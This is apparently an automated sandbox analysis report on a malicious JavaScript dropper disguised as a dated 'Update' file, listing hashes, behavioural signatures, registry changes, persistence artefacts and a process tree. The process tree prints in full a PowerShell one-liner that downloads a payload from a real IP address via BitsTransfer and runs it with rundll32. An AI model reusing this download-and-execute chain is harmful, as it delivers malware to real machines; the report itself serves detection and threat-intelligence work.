Resubmissions
15-08-2024 20:42
240815-zhg3jaxglr 1014-06-2024 12:05
240614-n89dxszekb 1028-05-2024 22:27
240528-2dhvdagb62 10Analysis
-
max time kernel
148s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20240508-en -
resource tags
arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system -
submitted
28-05-2024 22:27
Static task
static1
Behavioral task
behavioral1
Sample
Update_25_04_2024_3146918.js
Resource
win7-20240419-en
General
-
Target
Update_25_04_2024_3146918.js
-
Size
135KB
-
MD5
bf7f711e823916e5f56ff4d2286ee866
-
SHA1
d9c9d093ce5f1cbc78280ab0232b5d6ef8c25729
-
SHA256
0c9697506df18baac4b4215e78a43926ea4bb94ea3607c851a1c2fe3b5b31f17
-
SHA512
842616018719df7c6ee7cac5996ea1399a2a459353ee96de2bf9fda122aac861baa0a5c848dad1d4aa756fab897d1e7a978eac359458d52801020685db67d941
-
SSDEEP
1536:XDOApMn1gDmN2yBCn/yA3seAeLCMamLcInL1VXJ3Duvnr:6A+n1gDmNnw/yA3slMamLcInL7tDuvr
Malware Config
Extracted
http://185.49.69.41/data/d291855f9fd1c934f7c97a4d2ba99b89
Signatures
-
Blocklisted process makes network request 18 IoCs
flow pid Process 55 4632 rundll32.exe 56 4632 rundll32.exe 60 4632 rundll32.exe 61 4632 rundll32.exe 62 4632 rundll32.exe 63 4632 rundll32.exe 64 4632 rundll32.exe 66 4632 rundll32.exe 77 4632 rundll32.exe 78 4632 rundll32.exe 79 4632 rundll32.exe 81 4632 rundll32.exe 82 4632 rundll32.exe 86 4632 rundll32.exe 87 4632 rundll32.exe 88 4632 rundll32.exe 89 4632 rundll32.exe 90 4632 rundll32.exe -
Downloads MZ/PE file
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation wscript.exe -
Loads dropped DLL 1 IoCs
pid Process 4632 rundll32.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Drops file in System32 directory 1 IoCs
description ioc Process File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE\VM30CRET.htm rundll32.exe -
Drops file in Windows directory 1 IoCs
description ioc Process File created C:\Windows\Tasks\RtlUpd.job rundll32.exe -
Command and Scripting Interpreter: JavaScript 1 TTPs
-
pid Process 1152 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks processor information in registry 2 TTPs 5 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key enumerated \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor rundll32.exe Key queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor rundll32.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString rundll32.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor rundll32.exe -
Modifies data under HKEY_USERS 3 IoCs
description ioc Process Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix rundll32.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" rundll32.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" rundll32.exe -
Suspicious behavior: EnumeratesProcesses 6 IoCs
pid Process 4804 powershell.exe 4804 powershell.exe 4804 powershell.exe 1152 powershell.exe 1152 powershell.exe 1152 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 4804 powershell.exe Token: SeDebugPrivilege 1152 powershell.exe -
Suspicious use of WriteProcessMemory 6 IoCs
description pid Process procid_target PID 1264 wrote to memory of 4804 1264 wscript.exe 101 PID 1264 wrote to memory of 4804 1264 wscript.exe 101 PID 4804 wrote to memory of 1152 4804 powershell.exe 104 PID 4804 wrote to memory of 1152 4804 powershell.exe 104 PID 1152 wrote to memory of 1244 1152 powershell.exe 110 PID 1152 wrote to memory of 1244 1152 powershell.exe 110
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\Update_25_04_2024_3146918.js1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1264 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -c "start-job { param($a) Import-Module BitsTransfer; $d = $env:temp + '\' + [System.IO.Path]::GetRandomFileName(); Start-BitsTransfer -Source 'http://185.49.69.41/data/d291855f9fd1c934f7c97a4d2ba99b89' -Destination $d; if (![System.IO.File]::Exists($d)) {exit}; $p = $d + ',Start'; rundll32.exe $p; Start-Sleep -Seconds 10} -Argument 0 | wait-job | Receive-Job"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4804 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1152 -
C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32.exe" C:\Users\Admin\AppData\Local\Temp\4d3vott1.1ju,Start4⤵
- Drops file in Windows directory
PID:1244
-
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=4340,i,17096020621006928097,15544233752327415349,262144 --variations-seed-version --mojo-platform-channel-handle=3244 /prefetch:81⤵PID:2788
-
C:\Windows\system32\rundll32.exeC:\Windows\system32\rundll32.exe "C:\ProgramData\RtlUpd\RtlUpd.dll",Start /p1⤵
- Blocklisted process makes network request
- Loads dropped DLL
- Drops file in System32 directory
- Checks processor information in registry
- Modifies data under HKEY_USERS
PID:4632
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
141KB
MD5039ff182524d1f3c109869d5bee699a1
SHA19da43496bcb967ce77f18ed8a3ee19d53661e242
SHA256a5f16fa960fe0461e2009bd748bc9057ef5cd31f05f48b12cfd7790fa741a24e
SHA5123654009a9785e45488bb14cecea88a7a232976f003a32a9d5856572e491c580046629a3f0b2c130a1022a196677b1695643f7e2a457203233ba08fb13639317e
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82